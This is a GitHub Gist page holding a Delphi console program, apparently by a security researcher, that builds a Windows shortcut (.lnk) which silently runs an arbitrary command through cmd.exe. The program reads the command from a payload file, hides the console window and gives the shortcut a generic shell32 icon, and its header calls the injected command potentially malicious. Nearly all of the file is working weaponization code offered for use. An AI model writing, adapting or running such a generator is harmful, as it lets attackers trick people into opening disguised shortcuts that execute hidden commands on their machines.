Last active
April 3, 2021 13:21
-
-
Save DarkCoderSc/9ee4e536aa441b93715597835347fb08 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{-----------------------------------------------------------------------------------------------------------------------} | |
{ PHROZEN SAS (c) 2018 - www.phrozen.io } | |
{ Jean-Pierre LESUEUR ([email protected]) } | |
{ } | |
{ Create a Windows Shortcut by code and inject a potential malicious single line command, for post extraction and } | |
{ execution. } | |
{-----------------------------------------------------------------------------------------------------------------------} | |
program Shortcut_gen; | |
{$APPTYPE CONSOLE} | |
uses | |
System.SysUtils, ActiveX, ShlObj, ComObj, Windows, Classes; | |
function MaliciousLnk(cmd, destPath : String) : Boolean; | |
var cObject : IUnknown; | |
shellLink : IShellLink; | |
PFile : IPersistFile; | |
begin | |
result := false; | |
CoInitialize(nil); | |
try | |
cObject := CreateComObject(CLSID_ShellLink); | |
shellLink := cObject as IShellLink; | |
PFile := cObject as IPersistFile; | |
cmd := '/C "' + cmd + '"'; | |
shellLink.SetDescription('@DarkCoderSc'); | |
shellLink.SetPath('cmd.exe'); | |
shellLink.SetArguments(PWideChar(cmd)); | |
shellLink.SetShowCmd(SW_SHOWMINNOACTIVE); | |
shellLink.SetWorkingDirectory('%windir%\system32\'); | |
shellLink.SetIconLocation('shell32.dll', 1); | |
result := PFile.Save(PWideChar(destPath), false) = S_OK; | |
finally | |
CoUninitialize(); | |
end; | |
end; | |
var Arg1, Arg2 : String; | |
strList : TStringList; | |
begin | |
try | |
if ParamCount <> 2 then begin | |
writeln('usage:'); | |
writeln('- Arg1 : Payload file, generated with the "gen_shortcut_code.py"'); | |
writeln('- Arg2 : Full path of destination shortcut'); | |
exit; | |
end; | |
Arg1 := ParamStr(1); | |
Arg2 := ParamStr(2); | |
if NOT FileExists(Arg1) then exit; | |
// THIS IS JUST A LAZY WORKING EXAMPLE OF OPENNING TEXT FILES | |
strList := TStringList.Create; | |
strList.LoadFromFile(Arg1); | |
MaliciousLnk(strList.Text, Arg2); | |
strList.Free; | |
finally | |
writeln(#13#10 + 'Press enter to leave...'); | |
readln; | |
end; | |
end. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment